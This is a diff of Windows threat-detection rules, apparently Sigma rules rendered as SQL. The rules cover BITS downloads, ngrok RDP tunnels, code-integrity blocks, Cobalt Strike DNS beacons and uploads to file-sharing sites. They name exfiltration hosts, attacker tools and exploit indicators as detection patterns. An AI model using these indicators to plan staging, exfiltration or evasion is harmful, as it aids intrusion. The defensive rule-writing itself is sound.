"author": "Max Altgelt (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1137" + "attack.t1197" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' 
ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" ], - "filename": "file_event_win_word_template_creation.yml" + "filename": "win_bits_client_new_transfer_via_ip_address.yml" }, { - "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", - "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", - "status": "test", - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "title": "BITS Transfer Job Download From File Sharing Domains", + "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "status": "experimental", + "description": "Detects BITS transfer job downloading files from a file sharing domain.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.defense_evasion", + "attack.persistence", + 
"attack.t1197" ], "falsepositives": [ - "Unknown", - "Possibly some Microsoft Edge upgrades" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" + "filename": "win_bits_client_new_transfer_via_file_sharing_domains.yml" }, { - "title": "Legitimate Application Dropped Executable", - "id": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "title": "Ngrok Usage with Remote Desktop Service", + "id": "64d51a51-32a6-49f0-9f3d-17e34d640272", "status": "experimental", - "description": "Detects programs on a Windows system 
that should not write executables to disk", - "author": "frack113, Florian Roth", + "description": "Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' AND EventID = '21' AND Address LIKE '%16777216%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_exe.yml" + "filename": "win_terminalservices_rdp_ngrok.yml" }, { - "title": 
"Hijack Legit RDP Session to Move Laterally", - "id": "52753ea4-b3a0-4365-910d-36cff487b789", + "title": "CVE-2021-1675 Print Spooler Exploitation", + "id": "f34d942d-c8c4-4f1f-b196-22471aecf10a", "status": "test", - "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", - "author": "Samir Bousseaden", + "description": "Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1569", + "cve.2021.1675" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-PrintService/Operational' AND EventID = '316' AND (logs MATCH ('\"UNIDRV.DLL, kernelbase.dll, \" OR \" 123 \" OR \" 1234 \" OR \"mimispool\"')))" ], - "filename": "file_event_win_tsclient_filewrite_startup.yml" + "filename": "win_exploit_cve_2021_1675_printspooler_operational.yml" }, { - "title": "Suspicious ASPX File Drop by Exchange", - "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "title": "Code Integrity Attempted DLL Load", + "id": "f8931561-97f5-4c46-907f-0a4a592e47a7", + "description": "Detects attempted DLL load events that didn't meet anti-malware or Windows signing level requirements. 
It often means the file's signature is revoked or expired", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "status": "experimental", - "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", - "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3033' AND NOT ((FileNameBuffer LIKE '%\\\\Program Files\\\\DTrace\\\\dtrace.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND RequestedPolicy = '12' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\Gui\\\\Keybase.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE '%\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\') AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll' ESCAPE '\\' AND (ProcessNameBuffer LIKE '%\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessNameBuffer LIKE 
'%\\\\Windows\\\\System32\\\\SIHClient.exe' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Microsoft Office\\\\root\\\\vfs\\\\ProgramFilesCommonX64\\\\Microsoft Shared\\\\OFFICE%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\MSOXMLMF.DLL' ESCAPE '\\' AND RequestedPolicy = '7' AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\System32\\\\nvspcap64.dll' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\AppData\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\slack.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1') OR ((FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavcodec.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Mozilla Firefox\\\\mozavutil.dll' ESCAPE '\\') AND ProcessNameBuffer LIKE '%\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND RequestedPolicy = '8') OR ((FileNameBuffer LIKE '%\\\\Program Files\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\' OR FileNameBuffer LIKE '%\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\aswAMSI.dll' ESCAPE '\\') AND RequestedPolicy IN ('8', '12') AND ValidatedPolicy = '1') OR (FileNameBuffer LIKE '%\\\\Windows\\\\assembly\\\\GAC\\\\%' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\Microsoft.NET\\\\%' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy IN ('1', '2')) OR (FileNameBuffer LIKE '%\\\\Program Files\\\\Google\\\\Drive File Stream\\\\%' ESCAPE '\\' AND FileNameBuffer LIKE '%\\\\crashpad\\_handler.exe' ESCAPE '\\' AND ProcessNameBuffer LIKE '%\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' AND RequestedPolicy = '8' AND ValidatedPolicy = '1')))" ], - "filename": "file_event_win_exchange_webshell_drop.yml" + "filename": "win_codeintegrity_attempted_dll_load.yml" }, { - "title": "File Creation In Suspicious Directory By Msdt.EXE", - "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "title": "Block Load 
Of Revoked Driver", + "id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", + "description": "Detects blocked load attempts of revoked drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "status": "experimental", - "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", - "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001", - "cve.2022.30190" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3023')" ], - "filename": "file_event_win_msdt_susp_directories.yml" + "filename": "win_codeintegrity_revoked_driver.yml" }, { - "title": "Windows Binaries Write Suspicious Extensions", - "id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", - "status": "experimental", - "description": "Detects windows executables that writes files with suspicious extensions", + "title": "Code Integrity Blocked Driver Load", + "id": "e4be5675-4a53-426a-8c81-a8bb2387e947", + "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated code integrity policy", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\sihost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\')))" - ], - "filename": "file_event_win_shell_write_susp_files_extensions.yml" - }, - { - "title": "UAC Bypass Using EventVwr", - "id": "63e4f530-65dc-49cc-8f80-ccfa95c69d43", "status": "experimental", - "description": "Detects the pattern of a UAC bypass using Windows Event Viewer", - "author": "Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Event Viewer\\\\RecentViews' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\EventV~1\\\\RecentViews' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 
'Microsoft-Windows-CodeIntegrity/Operational' AND EventID = '3077')" ], - "filename": "file_event_win_uac_bypass_eventvwr.yml" + "filename": "win_codeintegrity_blocked_driver_load.yml" }, { - "title": "UAC Bypass Using Consent and Comctl32 - File", - "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", + "title": "Query Tor Onion Address - DNS Client", + "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", "status": "test", - "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects DNS resolution of an .onion address related to Tor routing networks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.command_and_control", + "attack.t1090.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_consent_comctl32.yml" + "filename": "win_dns_client_tor_onion.yml" }, { - "title": "Suspicious Creation with Colorcpl", - "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", + "title": "DNS Query for Ufile.io Upload Domain - DNS Client", + "id": "090ffaad-c01a-4879-850c-6d57da98452d", "status": "experimental", - "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", - "author": "frack113", + "description": "Detects DNS queries to \"ufile.io\". 
Which is often abused by malware for upload and exfiltration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE '%.gmmp' ESCAPE '\\' OR TargetFilename LIKE '%.cdmp' ESCAPE '\\' OR TargetFilename LIKE '%.camp' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_colorcpl.yml" + "filename": "win_dns_client_ufile_io.yml" }, { - "title": "Suspicious Interactive PowerShell as SYSTEM", - "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", - "status": "experimental", - "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", + "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1071.004" + ], "falsepositives": [ - "Administrative activity", - "PowerShell scripts running as SYSTEM user" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 
'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_system_interactive_powershell.yml" + "filename": "win_dns_client__mal_cobaltstrike.yml" }, { - "title": "SafetyKatz Default Dump Filename", - "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "title": "DNS Query for MEGA.io Upload Domain - DNS Client", + "id": "66474410-b883-415f-9f8d-75345a0a66a6", "status": "test", - "description": "Detects default lsass dump filename from SafetyKatz", - "author": "Markus Neis", + "description": "Detects DNS queries for subdomains used for upload to MEGA.io", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Rare legitimate files with similar filename structure" + "Legitimate DNS queries and usage of Mega" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" ], - "filename": "file_event_win_hktl_safetykatz.yml" + "filename": "win_dns_client_mega_nz.yml" }, { - "title": "Suspicious Executable File Creation", - "id": "74babdd6-a758-4549-9632-26535279e654", + "title": "DNS Query for Anonfiles.com Domain - DNS Client", + "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "status": "experimental", - "description": "Detect creation of suspicious executable file name. 
Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", - "author": "frack113", + "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Rare legitimate access to anonfiles.com" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_executable_creation.yml" + "filename": "win_dns_client_anonymfiles_com.yml" }, { - "title": "Pingback Backdoor File Indicators", - "id": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", - "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Suspicious AppX Package Locations", + "id": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (NewProcessName LIKE '%updata.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppXDeploymentServer/Operational' AND EventID = '854' AND (Path LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%/users/public/%' ESCAPE '\\' OR Path LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR Path LIKE '%C:/perflogs/%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%/desktop/%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%/Downloads/%' ESCAPE '\\' OR Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%C:/Windows/Temp/%' ESCAPE '\\' OR Path LIKE '%\\\\AppdData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%/AppdData/Local/Temp/%' ESCAPE '\\'))" ], - "filename": "file_event_win_malware_pingback_backdoor.yml" + "filename": "win_appxdeployment_server_susp_package_locations.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - File", - "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Suspicious Remote AppX Package Locations", + "id": "8b48ad89-10d8-4382-a546-50588c410f0d", + "status": "experimental", + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE 
